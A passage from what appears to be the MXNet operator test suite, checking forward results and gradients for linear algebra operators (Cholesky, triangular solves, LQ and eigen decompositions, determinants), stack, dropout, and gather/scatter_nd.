[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
        # Note: the input has to be symmetrized for the gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
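# Rationale for the combined symbol above (our note): for an LQ factorization
# A = L * Q with orthonormal rows in Q, the two grouped outputs should reduce to
# Q * Q^T = I and L * Q = A, which is exactly what test_laop_2 checks against
# res_eye and res_a below.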
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
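# Rationale for the combined syevd symbol (our note): syevd returns the eigenvectors
# as the rows of U together with the eigenvalues lam, so for a symmetric input A the
# grouped outputs should satisfy U * U^T = I and U^T * diag(lam) * U = A; test_laop_3
# below compares them against res_eye and res_a accordingly.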
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
    # Currently disabled on GPU as these tests need CUDA 8
    # while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
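# The reference gradient implemented above (our restatement of the code): writing the
# forward map as A = U^T * diag(l) * U and T = dU * U^T, the returned gradient is
#     dA = U^T * M * U,  with  M_ii = dl_i  and
#     M_ij = (T_ij - T_ji) / (2 * (l_i - l_j))  for i != j,
# which is symmetric because swapping i and j flips the sign of both the numerator
# and the denominator.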
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1896893923)
def test_laop_3():
    # Currently disabled on GPU as syevd needs CUDA 8
    # while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
def test_laop_4():
    # Currently disabled on GPU as syevd needs CUDA 8
    # while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
                    # test extraction of a triangle by doing a full roundtrip, since the intermediate
                    # extracted triangle has a different ordering than numpy's.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
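# Sketch (hypothetical helper, not collected by pytest): the lower/upper
# triangle extraction checked above rests on a simple numpy identity, namely
# that tril(A, k) and triu(A, k + 1) partition A.
def _demo_triangle_partition(n=4, offs=-1):
    a = np.arange(n * n, dtype=np.float64).reshape(n, n)
    assert (np.tril(a, offs) + np.triu(a, offs + 1) == a).all()
    return np.tril(a, offs)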
# Tests for linalg.inverse
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
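# Illustrative sketch (hypothetical helper, not part of the original suite):
# the comment in test_laop_6 relies on the matrix determinant lemma
# det(I + v v^T) = 1 + v^T v >= 1, which can be checked directly with numpy.
def _demo_det_rank_one_update(dim=4):
    v = np.random.random(dim)
    a = np.eye(dim) + np.outer(v, v)
    assert np.allclose(np.linalg.det(a), 1.0 + np.dot(v, v))
    return np.linalg.det(a)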
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@pytest.mark.flaky
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
        # Make sure the input contains no zeros (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
        # The relative error between input and output sums should stay within ratio/2 (empirical tolerance)
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
    # check whether the indices are out of bounds
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
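# Worked example (hypothetical helper, not part of the original tests): for
# sigma = 1 the threshold 1/sigma^2 is 1, so the reference above is quadratic
# below 1 and linear above it.
def _demo_smooth_l1_values():
    assert np.isclose(np_smooth_l1(0.5, 1.), 0.125)      # 0.5 * 0.5**2
    assert np.isclose(np_smooth_l1(2.0, 1.), 1.5)        # |2| - 0.5
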